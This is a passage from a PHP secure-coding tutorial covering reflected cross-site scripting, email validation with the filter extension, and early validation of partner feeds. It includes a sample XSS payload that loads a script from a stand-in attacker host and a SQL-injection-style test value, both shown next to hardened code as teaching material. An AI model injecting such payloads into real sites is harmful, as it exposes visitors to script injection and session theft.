Suppose a page on our website, for example a search engine, responds to GET parameters and contains the following snippet: SNIPPET 1 A legitimate user might get a page resembling this: However, any user can include HTML tags in the query and, at the very least, drastically change the way the page is formatted.
For example, an attacker can target particular browsers and send victims links carrying malicious GET parameters that load external JavaScript files into the page.
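The search page and the attacker's payload described above, as an added example that is not the page's own SNIPPET 1: the parameter name `q`, the function names and the host `attacker.example` are assumptions made for this illustration. The vulnerable renderer is shown beside its hardened form.

```php
<?php
declare(strict_types=1);

// Added example, not the page's SNIPPET 1. The parameter name "q", the
// function names and the host attacker.example are assumptions.

// VULNERABLE: the raw GET parameter is interpolated into the HTML body and into
// an attribute value, so any tag or quote the user supplies becomes markup.
function renderSearchVulnerable(string $q): string
{
    return "<h1>Results for: {$q}</h1>\n"
         . "<input type=\"text\" name=\"q\" value=\"{$q}\">\n";
}

// HARDENED: escape for the HTML context the value lands in. ENT_QUOTES covers
// both quote characters so the value is also safe inside an attribute;
// ENT_SUBSTITUTE replaces invalid UTF-8 rather than returning an empty string.
function escapeHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderSearchHardened(string $q): string
{
    $safe = escapeHtml($q);
    return "<h1>Results for: {$safe}</h1>\n"
         . "<input type=\"text\" name=\"q\" value=\"{$safe}\">\n";
}

// Constructed attacker input: breaks out of the value="..." attribute and
// loads an external script, as a link such as /search.php?q=... would carry.
$payload = '"><script src="https://attacker.example/x.js"></script>';

// When served over HTTP use the real parameter; from the CLI fall back to the payload.
$q = $_GET['q'] ?? $payload;

echo "--- vulnerable ---\n", renderSearchVulnerable($q);
echo "--- hardened ---\n", renderSearchHardened($q);
```

In the hardened output the payload survives only as text (`&quot;&gt;&lt;script ...`), so the browser never sees a tag. Escaping is context-specific: `htmlspecialchars` is correct for HTML body and attribute positions, but a value placed inside a `<script>` block or a URL needs the escaping rules of that context instead. As defence in depth, a `Content-Security-Policy: script-src 'self'` response header stops the external script from loading even where an escaping call has been missed.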
Fortunately, PHP 5.2 and later bundles the filter extension, a set of functions and filters that make testing an email address for syntactic validity straightforward.
Getting the email addresses you collect (for a newsletter, say, or for password retrieval) to at least conform to the standard, even if you cannot check more than that, is crucial, of course, and surprisingly tricky: a syntactically valid address says nothing about whether the mailbox exists, which only a confirmation message sent to it can establish.
The extension's API isn't very programmer-friendly, but the way it wraps all of the customary validation and sanitizing methods into one interface makes it worth knowing.
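An added example, not code from the page, of the filter extension doing the email check discussed above. The function name, the 254-octet length cap and the sample addresses are constructed for this illustration; the verdicts in the comments are the ones `FILTER_VALIDATE_EMAIL` gives.

```php
<?php
declare(strict_types=1);

// Added example of validating an address with the filter extension (PHP 5.2+).
// The function name, the length cap and the sample addresses are constructed.
function isValidEmailSyntax(string $candidate): bool
{
    // Do not silently trim: the value stored must be exactly the value validated.
    if ($candidate !== trim($candidate)) {
        return false;
    }
    // 254 octets is the practical upper bound for an address that fits an SMTP
    // forward-path (RFC 5321); oversized input is rejected before the filter runs.
    if (strlen($candidate) > 254) {
        return false;
    }
    // filter_var returns the (unchanged) address on success and false on failure.
    return filter_var($candidate, FILTER_VALIDATE_EMAIL) !== false;
}

// Constructed cases with the verdict FILTER_VALIDATE_EMAIL gives.
$cases = [
    'alice@example.com'            => true,
    'first.last+tag@example.co.uk' => true,
    'user@localhost'               => false, // domain part needs at least one dot
    'bob@example.com '             => false, // trailing whitespace
    'bob@exa mple.com'             => false, // space inside the domain
    'bob@example.com<script>'      => false, // markup is not part of a valid address
    'jürgen@example.com'           => false, // non-ASCII needs FILTER_FLAG_EMAIL_UNICODE (PHP 7.1+)
    'not-an-address'               => false,
];

foreach ($cases as $address => $expected) {
    $got = isValidEmailSyntax($address);
    printf("%-32s %-5s %s\n", $address, $got ? 'valid' : 'bad', $got === $expected ? 'ok' : 'UNEXPECTED');
}

// At the request boundary the same filter applies to raw input: filter_input
// returns null when the parameter is absent and false when it fails validation,
// so the two cases can be told apart and neither reaches the application.
$fromRequest = filter_input(INPUT_GET, 'email', FILTER_VALIDATE_EMAIL);
if ($fromRequest === null) {
    echo "no email parameter in this request\n";
} elseif ($fromRequest === false) {
    echo "email parameter present but malformed\n";
} else {
    echo "email parameter accepted: {$fromRequest}\n";
}
```

The filter checks shape only. `checkdnsrr($domain, 'MX')` can additionally confirm that the domain accepts mail, at the cost of a DNS lookup on every request; whether the mailbox itself exists is only proven by sending it a message containing a one-time token and waiting for the user to present it.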
The focus in this chapter is therefore how to make your applications more secure.
This chapter begins by reviewing the fundamentals of secure PHP programming.
Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the external party.
Data from every potentially untrusted source should be subject to input validation: not only Internet-facing web clients but also backend feeds received over extranets from suppliers, partners, vendors or regulators, any of which may itself be compromised and start sending malformed or malicious data.
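An added example, not code from the page, of the two principles above applied to a backend feed: the record is validated with a single filter definition at the point where the JSON is decoded, before any of it is used. The record layout (`sku`, `qty`, `unit_price_cents`, `contact`), the function names and the sample feed are constructed for this illustration.

```php
<?php
declare(strict_types=1);

// Added example: validating a partner feed at the moment it enters the
// application. The record layout, the function names and the sample feed are
// constructed for this illustration.

// Describes what a well-formed supplier record looks like; anything else is rejected.
function validateSupplierRecord(array $raw): ?array
{
    $definition = [
        'sku'              => ['filter'  => FILTER_VALIDATE_REGEXP,
                               'options' => ['regexp' => '/^[A-Z0-9]{4,12}$/']],
        'qty'              => ['filter'  => FILTER_VALIDATE_INT,
                               'options' => ['min_range' => 0, 'max_range' => 1000000]],
        'unit_price_cents' => ['filter'  => FILTER_VALIDATE_INT,
                               'options' => ['min_range' => 1]],
        'contact'          => FILTER_VALIDATE_EMAIL,
    ];

    // add_empty=false: keys missing from $raw are left out of the result instead of
    // being returned as null, so a count mismatch means a required field is absent.
    // Keys not in $definition are dropped, so unexpected fields never reach the app.
    $clean = filter_var_array($raw, $definition, false);
    if (!is_array($clean) || count($clean) !== count($definition)) {
        return null;
    }
    foreach ($clean as $field => $value) {
        if ($value === false) {       // that field failed its filter
            return null;
        }
    }
    return $clean;
}

// Constructed feed as a partner might send it: one good record, one with a
// non-numeric quantity, one missing the contact, one carrying an extra field.
$feedJson = <<<'JSON'
[
  {"sku": "AB1234", "qty": "12", "unit_price_cents": 1999, "contact": "orders@supplier.example"},
  {"sku": "AB1235", "qty": "12; DROP TABLE orders", "unit_price_cents": 1999, "contact": "orders@supplier.example"},
  {"sku": "AB1236", "qty": 3, "unit_price_cents": 500},
  {"sku": "AB1237", "qty": 1, "unit_price_cents": 500, "contact": "x@supplier.example", "is_admin": true}
]
JSON;

// Decode at the boundary; malformed JSON is an error here, not something to fix up later.
$records = json_decode($feedJson, true, 512, JSON_THROW_ON_ERROR);

foreach ($records as $i => $record) {
    $clean = is_array($record) ? validateSupplierRecord($record) : null;
    echo "record $i: ", $clean === null ? "REJECTED\n" : 'accepted ' . json_encode($clean) . "\n";
}
```

Run from the CLI, the first record is accepted with `qty` converted to the integer 12, the second is rejected because its quantity fails `FILTER_VALIDATE_INT`, the third is rejected for the missing `contact`, and the fourth is accepted with the `is_admin` field silently discarded. The point is that the code downstream only ever sees values the definition vouches for, whichever partner produced the feed.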